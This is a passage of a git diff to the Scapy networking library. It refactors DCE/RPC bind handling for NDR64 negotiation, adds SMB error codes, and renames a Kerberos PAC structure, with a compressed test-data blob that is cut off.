DceRpc5PortAny, - CommonAuthVerifier, - DCE_RPC_INTERFACES, - DCERPC_Transport, + DceRpcInterface, + DceRpcSession, RPC_C_AUTHN_LEVEL, ) @@ -45,6 +46,12 @@ prot_and_addr_t, ) +# Typing +from typing import ( + Dict, + Optional, +) + class _DCERPC_Server_metaclass(type): def __new__(cls, name, bases, dct): @@ -58,22 +65,20 @@ def __new__(cls, name, bases, dct): class DCERPC_Server(metaclass=_DCERPC_Server_metaclass): def __init__( self, - transport, - ndr64=False, - verb=True, - local_ip=None, - port=None, - portmap=None, + transport: DCERPC_Transport, + ndr64: Optional[bool] = None, + verb: bool = True, + local_ip: str = None, + port: int = None, + portmap: Dict[DceRpcInterface, int] = None, **kwargs, ): self.transport = transport self.session = DceRpcSession(**kwargs) self.queue = deque() + if ndr64 is None: + ndr64 = conf.ndr64 self.ndr64 = ndr64 - if ndr64: - self.ndr_name = "NDR64" - else: - self.ndr_name = "NDR 2.0" # For endpoint mapper. TODO: improve separation/handling of SMB/IP etc self.local_ip = local_ip self.port = port @@ -130,6 +135,8 @@ def spawn(cls, transport, iface=None, port=135, bg=False, **kwargs): :param iface: the interface to spawn it on (default: conf.iface) :param port: the port to spawn it on (for IP_TCP or the SMB server) :param bg: background mode? (default: False) + :param ndr64: whether NDR64 is supported or not (default: conf.ndr64). + This attribute will be overwritten if the client doesn't support it. """ if transport == DCERPC_Transport.NCACN_IP_TCP: # IP/TCP case @@ -287,39 +294,60 @@ def recv(self, data): auth_value=auth_value, ) - def get_result(ctx): + # Detect if the client requested NDR64 and the server agrees + self.ndr64 = self.ndr64 and any( + ctx.transfer_syntaxes[0].sprintf("%if_uuid%") == "NDR64" + for ctx in req.context_elem + ) + + # Process bind contexts and answer to them + results = [] + for ctx in req.context_elem: + # Get name name = ctx.transfer_syntaxes[0].sprintf("%if_uuid%") - if name == self.ndr_name: + if ( + # NDR64 + (name == "NDR64" and self.ndr64) + or + # NDR 2.0 + (name == "NDR 2.0" and not self.ndr64) + ): # Acceptance - return DceRpc5Result( - result=0, - reason=0, - transfer_syntax=DceRpc5TransferSyntax( - if_uuid=ctx.transfer_syntaxes[0].if_uuid, - if_version=ctx.transfer_syntaxes[0].if_version, - ), + results.append( + DceRpc5Result( + result=0, + reason=0, + transfer_syntax=DceRpc5TransferSyntax( + if_uuid=ctx.transfer_syntaxes[0].if_uuid, + if_version=ctx.transfer_syntaxes[0].if_version, + ), + ) ) elif name == "Bind Time Feature Negotiation": - return DceRpc5Result( - result=3, - reason=3, - transfer_syntax=DceRpc5TransferSyntax( - if_uuid="NULL", - if_version=0, - ), + # Handle Bind Time Feature + results.append( + DceRpc5Result( + result=3, + reason=3, + transfer_syntax=DceRpc5TransferSyntax( + if_uuid="NULL", + if_version=0, + ), + ) ) else: # Reject - return DceRpc5Result( - result=2, - reason=2, - transfer_syntax=DceRpc5TransferSyntax( - if_uuid="NULL", - if_version=0, - ), + results.append( + DceRpc5Result( + result=2, + reason=2, + transfer_syntax=DceRpc5TransferSyntax( + if_uuid="NULL", + if_version=0, + ), + ) ) - results = [get_result(x) for x in req.context_elem] if self.port is None: # Piped port_spec = ( @@ -349,7 +377,9 @@ def get_result(ctx): print( conf.color_theme.success( f">> {cls.__name__} {self.session.rpc_bind_interface.name}" - f" is on port '{port_spec.decode()}' using {self.ndr_name}" + f" is on port '{port_spec.decode()}' using " + ( + "NDR64" if self.ndr64 else "NDR32" + ) ) ) elif DceRpc5Request in req: diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index 7f92430e1f8..775bf06240d 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -2045,15 +2045,6 @@ def _getSessionBaseKey(self, Context, ntlm): return bytes(UserSessionKey) else: # Failed - from scapy.layers.smb2 import STATUS_ERREF - - print( - conf.color_theme.fail( - "! %s" % STATUS_ERREF.get(resp.status, "Failure !") - ) - ) - if resp.status not in STATUS_ERREF: - resp.show() return super(NTLMSSP_DOMAIN, self)._getSessionBaseKey(Context, ntlm) def _checkLogin(self, Context, auth_tok): diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index a19c5b97159..d76f982b745 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -92,6 +92,8 @@ # SMB2 sect 3.3.5.15 + [MS-ERREF] STATUS_ERREF = { 0x00000000: "STATUS_SUCCESS", + 0x00000002: "ERROR_FILE_NOT_FOUND", + 0x00000005: "ERROR_ACCESS_DENIED", 0x00000103: "STATUS_PENDING", 0x0000010B: "STATUS_NOTIFY_CLEANUP", 0x0000010C: "STATUS_NOTIFY_ENUM_DIR", @@ -101,6 +103,8 @@ 0x80000005: "STATUS_BUFFER_OVERFLOW", 0x80000006: "STATUS_NO_MORE_FILES", 0x8000002D: "STATUS_STOPPED_ON_SYMLINK", + 0x80070005: "E_ACCESSDENIED", + 0x8007000E: "E_OUTOFMEMORY", 0x80090308: "SEC_E_INVALID_TOKEN", 0x8009030C: "SEC_E_LOGON_DENIED", 0x8009030F: "SEC_E_MESSAGE_ALTERED", diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index 14eb47f8cf5..360acbce824 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -1216,7 +1216,11 @@ def __init__( # For some usages, we will also need the RPC wrapper from scapy.layers.msrpce.rpcclient import DCERPC_Client - self.rpcclient = DCERPC_Client.from_smblink(self.sock, ndr64=False, verb=False) + self.rpcclient = DCERPC_Client.from_smblink( + self.sock, + ndr64=False, + verb=bool(debug), + ) # We have a valid smb connection ! print( "%s authentication successful using %s%s !" @@ -1271,7 +1275,7 @@ def shares(self): # Poll cache if self.sh_cache: return self.sh_cache - # One of the 'hardest' considering it's an RPC + # It's an RPC self.rpcclient.open_smbpipe("srvsvc") self.rpcclient.bind(find_dcerpc_interface("srvsvc")) req = NetrShareEnum_Request( @@ -1283,10 +1287,12 @@ def shares(self): ), ), PreferedMaximumLength=0xFFFFFFFF, + ndr64=self.rpcclient.ndr64, ) resp = self.rpcclient.sr1_req(req, timeout=self.timeout) self.rpcclient.close_smbpipe() if not isinstance(resp, NetrShareEnum_Response): + resp.show() raise ValueError("NetrShareEnum_Request failed !") results = [] for share in resp.valueof("InfoStruct.ShareInfo.Buffer"): diff --git a/scapy/modules/ldaphero.py b/scapy/modules/ldaphero.py index 649673a5c12..dd518ec0ecc 100644 --- a/scapy/modules/ldaphero.py +++ b/scapy/modules/ldaphero.py @@ -697,7 +697,8 @@ def resolvesids(self, sids): IDL_DRSBind_Request( puuidClientDsa=NTDSAPI_CLIENT_GUID, pextClient=DRS_EXTENSIONS(rgb=bytes(DRS_EXTENSIONS_INT(Pid=1234))), - ) + ndr64=client.ndr64, + ), ) if bind_resp.status != 0: self.tprint("Bind Request failed.") @@ -719,7 +720,8 @@ def resolvesids(self, sids): rpNames=unknowns, ), ), - ) + ndr64=client.ndr64, + ), ) if resp.status != 0: self.tprint("DsCracknames Request failed.") diff --git a/scapy/modules/ticketer.py b/scapy/modules/ticketer.py index 6abb6e98b1b..87c591753bc 100644 --- a/scapy/modules/ticketer.py +++ b/scapy/modules/ticketer.py @@ -88,7 +88,7 @@ PAC_CLIENT_INFO, PAC_INFO_BUFFER, PAC_INFO_BUFFER, - PAC_REQUESTOR, + PAC_REQUESTOR_SID, PAC_SIGNATURE_DATA, PACTYPE, RPC_SID_IDENTIFIER_AUTHORITY, @@ -1414,7 +1414,7 @@ def _build_ticket(self, store): ) + ( [ - PAC_REQUESTOR( + PAC_REQUESTOR_SID( Sid=self._build_sid( store["REQ.Sid"], msdn=True ), @@ -1867,7 +1867,7 @@ def _getPACRequestor(self, pac, element): pacRequestor = pac.getPayload(0x00000012) if not pacRequestor: pac.Buffers.append(PAC_INFO_BUFFER(ulType=0x00000012)) - pacRequestor = PAC_REQUESTOR() + pacRequestor = PAC_REQUESTOR_SID() return self._make_fields( element, [("ReqSid", self._pretty_sid(pacRequestor.Sid))] ) diff --git a/scapy/packet.py b/scapy/packet.py index 8c558513157..8f17a104b00 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -717,7 +717,7 @@ def self_build(self): except Exception as ex: try: ex.args = ( - "While dissecting field '%s': " % f.name + + "While building field '%s': " % f.name + ex.args[0], ) + ex.args[1:] except (AttributeError, IndexError): diff --git a/test/scapy/layers/dcerpc.uts b/test/scapy/layers/dcerpc.uts index 832767e9e26..e496b68719c 100644 --- a/test/scapy/layers/dcerpc.uts +++ b/test/scapy/layers/dcerpc.uts @@ -407,7 +407,7 @@ import zlib data = zlib.decompress(b'x\x9c\xed\x9dw\x9c\x13\xd5\xfa\xffg\xe9K\xdb\x05D\x8a\x94(Udq2-\x13@$uY\xb6\xb2K\x17\x81\xc9\xccd\t[\x12\x92\xb0\x14\x15dY\x90*\xbdw\x10iJG\xe9 ^T@DDl\xc0\x15\xb9(`\xa1\xd8\x81\x8b~\x93%\x08\t$\xcf\x9c3s\xff\xf9\xfd\xc8\xeb\xb5\xafA?\x9fy\xe7\xccs\xce<\xcf\xcc\x99\x12\x82\xb8\xff\xb3>\x8e ~\x8d\xbb\xfb\xef\x9d3\xb3\x8bv\xf7\xdf\xdei\xfa\xa5\xf1\xb7\x86\x14-\x9a\x16\x92\x88;\xcbH\xbd\x0c\xa0\x97\x05\xf4r\x11\xfae\xd7\xd8\x8d\xdb&\xad\xb4,\xadS\xf2W\xf0\xbf\xcb\x03z\x05@\xaf\x18\xa1\x1f<\xd2}1\xf3]\xaey\xd4\xab\x7f\xaf:\xfd\xcd\x8d\xb1\x95\x00=\x1e\xd0+\x03z\x15@\xaf\n\xe8\xd5\x00\xbd:\xa0\'\x00z"\xa0\xd7\x88\xd0#?5\x01\xbd\x16\xa0?\x02\xe8\xb5\x01\xfdQ@\xaf\x03\xe8u\x01\xbd\x1e\xa0\xd7\x8f\xd0\x85\x1fz\x9cZ^\xbfB\xca\x8c\xd9M.n/\x93F=\x06\xe8\r\x00\xbd!\xa07\x02\xf4\xc6\x80\xae\x03\xf4\xc7\x01\xfd\t >M\x00\xbd)\xa07\x03\xf4\xe6\x80\xde\x02\xd0[\x02\xfa\x93\x80\xde*B\x9f\xf0\xfa\xa7/\xf6\xcd\xca\xb3mjt\xb8h\xe5\x99\x94\x06O\x01zk@O\x02\xf46\x80\xfe4\xa0\x93\x80\xae\x07\xb6\x9f\x02t\x1a\xd0\x19@g\x01\x9d\x03t\x03\xa0\xf3\x80n\x04\xf4\xb6\x80\xde\x0e\xd0\xdb\x03\xfa3\x80\xde\x01\xd0\x9f\x05\xf4\x8e\x80n\x02t3\xa0[\x00\xdd\n\xe86@\xb7\x03z2\xa0w\x02\xf4\x14@\xef\x0c\xe8\xa9\x80\x9e\x06\xe8\xe9\x80\x9e\x01\xe8\x99\x80\x9e\x05\xe8]\x00=\x1b\xd0s\x00\xbd+\xa0w\x03\xf4\xee\x80\xde\x03\xd0{\x02z/@\xef\r\xe8\xcf\x01z\x1f@\x7f\x1e\xd0\xfb\x02z?@\xef\x0f\xe8\x02\xa0;\x00]\x04t\t\xd0e@w\x02z.\xa0\x0f\x00t\x17\xa0\x0f\x04\xf4<@\xcf\x07\xf4\x02@/\x04t7\xa0{\x00}\x10\xa0{\x01\xdd\x07\xe8~@\x1f\x0c\xe8E\x80>\x04\xd0\x87\x02\xfa0@\x1f\x0e\xe8/D\xe8~\xd9[\xe0\xf3\x16\xfd\xa3\xbf\x18Z\x06\xcf\x93R\n<\xf9:\xa7\xd7%\x17J\xf9\xc3t\x85B\x81|\xdf\xf9l\xdcK\xc0\xf7\x8d\x08-\x83\xc7\xa5\x19\xb2\x7f\x88\xdb\x9b\xa7\xb3\xb8\x0b\x0be\xd1\xefr\x17\xea\xcc^w\x9e\xec\xd5\xf9doQ`\x11\xf8"\x8f\xdbU\xe8\x7f\x00g\xa4F\x9c\x975\xe2\x8c\xd2\x88S\x1cZ\x06\xcf\x1bSMY)\xba\x9c\xc0*.Q\x8e\xb5\xceh\x8cuJ0\xd6\x19\x83\xb1\xce\xd8\xd0\xf2Y\x94\xb8\xe8\x9cn\xaf.\xc3b\xd6e\xcb>\xd9\xaf+pK\x83\xf3\xe5\xfb\xd9\xafh\xc8~o\xde\xc7\xb7*|].e\xf4\xd6\xd5\xc3[Lm\xef\x19\x17bG\x1b\xc7\xe3\x01}B\x84~\xe5\xe4\x87\xdbxs\x15\xeb\xae\xa5\xf3\x96\x14Oi\xf0\xd7D`\xfdI\xa1ep\xfe!#;\x0b\x1c9\x93\xef\xf5\xe7\xa4\x80\xfeWC\xcb\xe0\xfc\x8a\xadH\x0e\xc4%\xdf\x9d\xab\xebj\xc9J\xc9\xba\xcf;\x05\xc1;\x15\xc1;-\xb4\x0c\xce1X;Y\xb2\x8a8\x9d%\xdf\x15\\\'-;\xcb\xa2\xb3Ek\xfbt\xcc\xf5f\x84\x96\xf5C\xebE[\xeb\xfd?\x8e7\xddP\xd42s\xe1\xd1\x91\xf9o\xd9\xc7\xc6\xcd\x0c\xad\x17\x9c+I\xf6\xba\x07{tY\xee|\x978L\x17\\/\xa50\x902\x9d\x82\x18\x18C\xb9\x1e\xb1\x14x\xe7\xfbf\x85\x96\xd1r\xa7\xc7\xebv\xba\xf2\xe5;%\x88\x98\r\xf8}r\xe1?\xde\xe0g\x0e\xa2\x7f.\xe0\x8f\xfc\xcc\x0b-\xa3\x8d\xd1\xf9\x80\xbe\x00\xd0\x17\x02\xfa"@_\x0c\xe8K\x00})\xa0/\x03\xf4\xe5\x80\xbe\x02\xd0_\x03\xf4\x95\x80\xfe:\xa0\xaf\x02\xf4\xd5\x80\xbe\x06\xd0\xd7\x02\xfa:@\x7f#\xb4\x0c\xeeW=\\\x85\x9d\xfc~\x8f\xce4\xd8\xefN\xca\xf2\xba\x87\x0e\xbbS]\xee_\xefM\xcc\xf5\xd6\x87\x96\xc19\xefn\x81\x04\x99\x9e\xeb\rd\x80\xfb}\x1b\x14\xfa6*\xf4mR\xe8\xdb\x1cZ\x06\xe7\xfc\xedCt\x81\n\xeb\xbb\xcf\xb3E\x81g\xab\x02\xcf6\x05\x9e\xb7\x14x\xdeV\xe0\xd9\xae\xc0\xb3C\x81g\xa7\x02\xcf\xae\xd028/n\x16|\xb2\xce\xee\xf2\xcaC\x84\xfc\xfc@\x82\xcfu\x15\xca\xc1\xb5\xee[)\xf0\xd9\x1dZ\x06\xafWX\x9d>\xab\xaf\xb4\x82>p\x18\x11{\x10\xbc{C\xcb\xe0\x0e-\x83\xd7/n\xa7\xcdt\xa1P\xc8\r\x1c2\xde>\x86Qp\xaaB\x1c\xd7\x80\xf1\x89\x06\x8c\x13\xa1e\x8b\xfb\x18\x81#\xac"\x97\xa4\xe4\xc4\xebS\r\x18\'5`|vO\r\xd0\xa7\x87\x84\xd2\xfb\xc2\xd2\xfb\xf5p\x15J\xee!\xa1K\xf0\xd9Y\x96>\xd1\xee\x96\x99\x01pg\x02\xfa\xac\x90\x10\xbc\xe7\xa2\xbb\xa70\xea=\x17\xb3\x15\xfa\xe6(\xf4\xcd\x8d\xe2s\xaei\x917zz\xcf\xb4U\xe3\xc7\xfe\xfdJ\xe2\xce\xc5\xf3"\xda\x1f\xa9\xcf\x8f\xd0OU\x95\xcc\xcf\xb3\xc6\xcc\x05sV\xd1S+V\x18\xbf B\xb7\x97;;|\x89\xef-[\xf1\x91W\xe6\x0cJ\x1c;la\x84\xce2\xba\xdcn\xee\xda\xb6\x89SV1\x1b\x9b?\xfa\xc8" ~\x8b\x01}\t\xa0/\x05\xf4e\x80\xbe\x1c\xd0WD\xe8K{\x9dj\xc7}nM\x9f\xea\x7f\'xi4\xee5`\xfd\x95\x80\xfe:\xa0\xaf\x02\xf4\xd5\x80\xbe&B\xaf\xf8\xd3;\xcf\xfd\xf6[\xbfN\x8bn\xb9?~\xe3\xfa\xf2\xf6kCB\xf0Y~\xbb\xd7G\xdd{\xe1,\xd2\xbb.\x867\xf2\xf3\x06\xd0\xae7\x01}}H\x08^\x1f\xc9\x12\x85\x9c"\xf1\xf6\xf3\x8a\xc1\xbf\xf2\x81\x8c]\xcd\xf3W\xef/O\xbe\xde\xcb\\\xdc\xa6u\xc9W\rOU\x8b#\x82\xaf{\x08\x08\xe5\x9e\x1f7\xe1\x87\x06\x87j,\xb9X\x89x*\xb1S\xff2\xa5B\x1cQ\xe5\xf6\xa2b\x19\xe2@`\x11_\x8e\xd8\xbf\x9a\x90J\x9f1\x0c\xfe\x95\xc3bV\xbd\xbdHL$n\'\x1c_\xce\x80\xc1\xfe\xc0\xb2\xb0\xf4\xd9\xb7\xbej\xdb\x9aP\x8b\xe8\x93\x95\x92e\xeb\x93R\xe8\xf2\xff\x83\x8e#jT \xfa\xf4\xb1Z\x82\xcf?g\x86\xfe\xd4\xb5?!\x903}\xb9\xa9\xd9\x1e\x914P\x06\x03I\x84\xc7\xe5\xdd\xe6?\x17=\xf2c3\xcb\x84y\x03\xedLI\xdd\rZ\xc5\x05\x99\x8b\x19\x17\xec\xf6\xdf\x1f\x97\xe03\xb9\x9d\xeep\xb7\xfd{\xc1\xc7\x83\x04\xa6\xf3\xbes\x15n\x14\xcb\xcd\x06(\xe6V"D\x9f\xec\xf0\x0cv\x94>\xe3\xd9S5\xaf.\x11|\x8e!\xc9\xc1\xc92/K\x94\x91eX\x916:EN[\xbe\xec4R\x06=\xe948E\x07\xc5\x18)J\xd0\x96op2<\'\x91F\xbdL3\x06R\xefp\x8a\xda\xf2Y\x92\xe2\x1c\x92\xc0\x93\x1c-R$GQFm\xf9zFt\xb2\x06\xd6\xe1`$Jp\xf2\xa2\x91)}\x86\xb5\xbfj\xbe\x8e\xc8L\xb3\xd9(\x1bI[\xf4\x9c\x89\xb2\x1b\xf5\xa4\xc1\xce\x1b,,e\xd2\xdb\xedv\x9e\xd7v;H#gt\xb2N\'\xa9\xa7\x05#\xc7\x8b4\xd6\xd5\xf2\xa1\xb1\xae\x96\x0f\x8dul>\xe2XW\xbb\x1d\xd0X\xc7\xe6\xc7\x18\xeb\xd8\xcc\xffQ^\x7f\x98w\x1f\xe6]\x15y7\x8c\xf7X\xc5^gjS\xbd\xd2JF\xcdi\xf3\xd5\xe9\x84\x81jy/\xc4%Wk\xb7\xe5M\xfb\xe2\xba\x7f\xcd\xb6\xe5g\rU\xcb\xab\xe2\xee8\xcb\xb8\xb9\xaee\xda\xae\x8fV\xbc\xe6\xbezZ-\xef\xc3u_d\x9c\xbb6\xd12\xb7\xf1\xae\xea\x13v\xc7UU\xcb\xb3\xff~-aW\xad\xca\x1d\xd7e\xcd\x1f\xfa\xf3\xdb\xab{\xab\xe5\x15.-v\x9d\xeb\xb7\xc9\xbee\xe1\xf2\x83\xb6}K]jy\x83\x98V\x95\xde\xd2\xb72\xef\xd0\xaf\xb4\xc6\xcd\xae\xeaP\xcb\xdb\xc8\x9d\xbf!m\x7f\xa5\xf3\xe2\xaf\x9e\x1c\x93|\xb4\xf8g\xb5\xbc\xc33\x9f\xf9V\xf2\x1b;m\xb4\xc6/\xbf9\xb1\xed\xb7jy{K&\xd7\x996}fJ\xf1{\xcfN\x9d\x7f\xb8wY\xb5<\xe7\xa57\xd2-\xcb\xb3\xac\xeb\x9f]\xf0\xc2\x91\x9c\xda\xdb\xcb\xa8\xe4\xfd\xbe\x9b\xaa\xbb\xfd\xf0\xa7\xa61\x9f\x1c2U\x94\xfeP=^\x8e\xddx\xfc\xe0\x9a\xf8\x83\xe6M\xdd\xbc\xfc\x98YG\xae\x12*y\x1f}9\xb2u\x85\x0b\x1dS\xb7\xd6\x9c\xa5\xafxe\xc1F\x0c^X\x8e}\xf7\xc8\xbaq\xdf3\xeb\x8b\x8ak\x17\r\xd6\xc9\xbd\x9b(\xe6)\xacEj\xf9P-\xc2\xe6#\xd6"\xb5\xdb\x01\xd5"l~\x8cZ\x84\xcd\x8c2Vv\xd79P\xb4\xf5\x838\xf3*\x9b\xa1\xed\x97e\x9f\xaa\xaf\xf5q\x8bZ>4V\xb0\xf9\x88cE\xedv@c\x05\x9b\x1fc\xac`3\xa3\x8c\x15j\xc7w\xdd\x86\xd5\xfb\xcc6\xf5\xe0H\x87\xc7k\xaa\xa9\xf5XQ\xcb\x87\xc6\n6\x1fq\xac\xa8\xdd\x0eh\xac`\xf3c\x8c\x15lf\x94\xb1\xb2w\xd3\xc81\x99\x95\xb6en[\x98\xda:\xf5\xdb\xab\xc7\xb4\xeeKl>b_\xaa\xdd\x0e\xa8/\xb1\xf91\xfa\x12\x9b\x19\xa5/7\x9c:\xbc=\xf5\xe2\x0e{\xc9\xcf\xeeA\xfb\x9f]\xdcM\xeb\xbe\xc4\xe6#\xf6\xa5\xda\xed\x80\xfa\x12\x9b\x1f\xa3/\xb1\x99Q\xfarV\x99\x7f\xe9vN\xfe\xae\xd3\xfa}\x1d\x86^i\xb7\xc9\xaau_b\xf3\x11\xfbR\xedv@}\x89\xcd\x8f\xd1\x97\xd8\xcch9vw\xadf\x9f\xe6w\xb2\x8c\xe9;\xe2f{\xba\xe0\x84\xe69\x16\x97\x8f\x9acUn\x07\x98cq\xf9\xb1r,.3J_\xb2-:T[\xfa\xd1\x87\x19k\xce\x99\x96\x7fQ\xff\xa7\x0c\xadc\x80\xcd\x8f\x11\x03lf\x94\x18\xdc\xbc^\xfe\xbd\x15W[e,\xf5\xf9\xba\'L^\xdcA\xeb\x18`\xf3c\xc4\x00\x9b\x19%\x06\xd3\x0e\x1b\x1e\xdbT\xd47s\xc5\xfb\xad\xf6\xbd\xd7\xf8\xa9\x8dZ\xc7\x00\x9b\x1f#\x06\xd8\xcc(1\xf8\xa6\xdd\x7f\'^)H\xca\xd8\xe0\x7f1\xf9h\xe5\x7fw\xd6:\x06\xd8\xfc\x181\xc0fF\x89A\xc7Us\x93\x1a\xf6\xdcaZ[m\xf5\xc4E}.\xf1Z\xc7\x00\x9b\x1f#\x06\xd8\xcc(\xf3b3\xd7\x0be\x1f-\x9b\x9f6\xe1\x8b\x833\r=\x89sjy\xedF7\xedY\xbf\xfd\'\x9d\xf7\xdcz\xb7a\xbds\x1dp\xee\x15\x08\xe3y\xe2\xd7\xeeig\xea\xd0y\xf1\xf3\xbf\x9f^4\xa2b\x7f\xb5\xbc\xf1\x93\xe9v7\xf2\xb7[KF\xe4\xd4\xd6\xef\x9e7]-o\xc7\x89\xe2W\xf6\xfc`\xb5\xaf\xf8\xe2\xa27g\xd4\xb4\x05jyL\xd9\xe7*u=?-}\xc1$\x13s\xfd\xc2\x8c_\xd4\xf2\xb6\xe7\xfd\x98z`\x9b;u\xf3;\xcf\xaf<6\xfd\xe3/U_\xe3+x\xe3\xd0\xdb\xc5\xdd2\xd6O8/\xfd\xf4\x82y\x08\xf2\xf5l\x03O\xd12)\x89N\x92b$F\x14\xc4\xff\xc1\xbd\x95\xacE\xaf\x8fhw\x8f\x17\x12\xce7\x1b~"m\x19;\xf2\xa5g\xae\x1f\xcfCm7\xcf3NQ\x12DR&I\x9a\xd4\x0b\x066\xfc8\x0e\x9b_z\x1c\xc7\x1a\r\xbc\x9e4Q6\x83\x9d\xb2\x9bi\x13G\xf2&\x83\x81d9\x96\xa4\xb4\xdd\x0e\x87\x18\x8c?\xcd\xf1\x0e\x86%e\x9a\xa7Hm\xf9\xfa@\xb7\x8a,K\xb1\x94\x9118\x1c\x923\xe2\x9e\xd4\xbe\'\x13\xc6\xed\xb0\x9c\xad\xb1i\xf5\xb1\x8c\xaf?\xd7\x8d\xd1\xba\x1f\xb0\xf9\x88\xfd\xa0v;\xa0~P\xcb\x87\xfa\xa1q\xf1\x13\xd9\xe7N\x8e\xe9Tr\xad\x9f0f\xe9\x8f&\xad\xdb\xaf\x96\x0f\xb5_\xf5\xb5z\x80\xff\xde\xa7\xc4\xca\xe3\xd5,\xb6\xddUO^g\xc6~\xff\'\xfa\xb1A\xe0\xc4\xcf)\xf2\x92\x93"I\xc9\xc8\x90Fm\xf92\'3\x12-\x08\xa4\xd1ht\xca\x02\xad\xd7\xf8\x1e8\x88_\xf5\xe0\x9b\xe4\xee>\x1f\xd9\xe7W\x9f6-y\xfc\xb9\xf6\xa8|\'\xc3\x1aE\x07\xcd\xf3N\x83\x81rH")\x85\xf3\x8fUY5bC\xa7\x81\x99\xe3\x07\x0c\xb4V\xecz\xf2\x06r\xffR\x82(r\xa4^b\x04\')\xcb\x81\x7f\x87?\xef\xf1\xc7\x86\xbd\xbf\xd7k\xb4+s\xc9\x94\xed\x8buu\xe9\x17\x95>+\x10|\xde#\xee\xee\xf3\x1e\xc1\xdfD\xea\xad\x96\x99\x90@\xf4\xf1\xb8\xac\xfd\x1b\xb3_5\xac\xd9\x7f\xacFq\x12\xb1\x96\xe8r>A\xeb\xb1\x83\xccGl\x7fq\x85?\x1aw\xa9|\x91\xacX\xe0\xafr\xf1\xa3K\x13\xb5n?2\x1fq\xec7\xb8\xe2\xaf\xfc\x9a\xa9B\xc6\xe8\xf5\xa7\xfd7\x1b\x9c\xc9\xd1\x80\x1f|HZ\xbe\xc3O?\xe3c\xc6\xb5\xa9\xd0q\xe1\xce\'z\xc4\xc7\x9fI,\x1f\xc0\xc4)\xe17#H\xd9IR2\xcf\'\xc9\x0e\x9aNb\x18=\x97\xc4S\x14\x95\x148\xb3&\r$\xed\x08\xeck\xc2}\xc7L\xd8\xdfw\xe7\xdcHp\xf2\x1c-\x88\xce\xc0\x169dJd\xd8p\xbend\xfbj\x93\x1bt\xb5/\xdb\xd2\xa5{\xbb\'\'~\x85|\xcc\xc4p\x06\x03\xc712\xeb`\x03Gd\x8c\xde\x18>G\x80\xcd\xbf}\xcd\xcd\xc22\x16\xcefb\xad\xac\xd1`dm\xa4EO\x1b\xf5\xb4IO[#\x9e\xe9{k\xe7\x94M\x7fv/\x93\\r\xd6T\x9e\x9a\xb1Z\xf9=\xaf\n\xb7\x03\x9b\x8f\xb8\x1d\xc5\xcdw<=O>m^_kO\xeb\xd5\x0b\x8e7@\xae\x9bFY\x12D\x81!y\xde@\xd3\xbc\xc09\xb5\xe5;\x04\x87@\n\xb23p$\xaeg\xf5\xa4\xc0;\xb4\xe5\x8b\x0c/\xd1\x0c\xcbI\xa4\x9ebX)\xb01\xda\xf2\xe9 \x94"%\xde\x118\xc6\xd7\x1beg\xe4\xbd\xa0\xb4\xff\xd7E\x1dz\x98\xd6~:zm\xe3>IiZ\xc7G-\x1f\x8a\x8fZ>\x14\x9f}5\x16\x8d\xdc12\xcf\xb2\xba\xe6\xe6\x93U\x9fOS~o\xb4\xc2\xf6\xab\xe5C\xedoV.\xe5L\xb3\x1c\xd9\xf6\xb6\x7fD\x8b\xcf\xf6/l\xaa!\xbf\xb4~\xfee\xa95rMV\x8b\x94UC\xab\xf6\xec\xd5\xe5\x857\x14\xd7\xcfj\xa1\xfa9$\xcf\x17Q@\xc3\xda\x8f\xcc\x8f\x8c\xbf^\x96\x1c<\x1f8\xbbu\n\xc1\x19\'*"\xffT\xab_\xe9\x87\xcb\x89\x13\x92\x97\x9d\xc9\x9a\x97=\xfa\xc2\xea\xb2\x1a\xf3\xe3\xb7\x1e\xfa\xf9\xd0;\x84i\xac\xf1\x8bu\x8f\x8cu!_\x0b\x85\xf8g\xb6\x1d?0\xeaF\x7f\xeb\xa2\xcf.\xc8\x13\xc7\xd8R\x91\xf9\xb2\xc8K\x0e\x87S\xa6(\x89\x97E\x83\x1cQ\x07\xb0\xf9\xa5u\xc0L\x19\x18\xbd\x9e\xe2\xf4V\x0be5\x18H\xd2\xa6\xe7X\xab\x857\xd9-\x11\xe3t\x83#\xe3\xd7M_\x1d\xb0\xbe\\\xab\xdc\xfcE\xe7\xeb(\x9f\xd3Q\xb8\x1d\xd8|\xc4\xed(\x9f\xfb\xc3\xf0\xef\xda\xd6O\x1e\x97\xf4\xcb\xc2\xc4\xc5\xa7\x91\xef\x1d\x85\xb6\x03\x9b\x8f\xb8\x1d\x8c\xf0\xc7\x85\xdf\x16\xa7\xa4,\xff\x8c\x1e\xf0a\xfc8\xe5\xd7\n\x15n\x076\x1fq;*O\x1d\xb9\xe5\xfc\xf7\xe5,\xcb\xd7\xd5\xdc\xe5\x9c\x147N\xeb\xed\xc0\xe6#n\xc7\x8a\xfc\x9b\xeb\xfaVe\x92\xa7\x8f\xa9|\xd9\xfb\xd7d\xf4\xe3\x0c`;\xb0\xf9\xf0v\x84}\x8f\xa7\xf7\xfc\x7f\x8d\x9c\xe0\xc9\xd8\xf9h\xa3)\x8d\xebu\xb8\x86\xf6=V+\xc3\xf1\xa4\xd9\xcc[\xadz\xce@2F\x93\xc1\x1c8\xb0\xd4\x9b)J\x1f>w\x89\xfd=\xd5\x89\xae\xb2W\x96\xdc\x16w\xa1\xdf\xeb\x0e\xde#\x91\x1d\xfaS\xc7\xad\x19\xe2Z]Bn\xa1\xdb\xe7w\x89>"\xe2\xdc\x07\x9b}\xe7\xba\x87\xcc\xd0\x06\x9ee\x9d\x92\xa4g\x04V\x16\xc5\xf0\x98\x0c9\x9b\xf7n\xea7\x972\'\xec\xbe\xd8\xfdJf9\xe5\xe7\xa2@L\xb0\xb9\nb\x82\xcdV\x18\x93\xcdl\xff6\xd7.\xae2-\xb5\xcay\x96\x85i\x8cV1\xc1\xe6*\x88\t6;zL\xc2\xf8\x03+&u{\xf2\x885c\xe2\xc0\xe3}{\x9d\xdb\xaf\xfc>\x89\xe8\xfc\xb0\xf9\xd7\xf5-\x96wy\xae\xf8g\xd3\xd65\xf5\x0fu\x1b\x9eX\x17e\xfe\xb5\xe6\xdd\xf9\xd7\xb0~Df\xde\xed\xc7\x0c[\xd7\xb4\xcc\xe4\xcc\x8c~\xc1\xc6\x13\x84vm\xad|\xb7\xad\x8e\x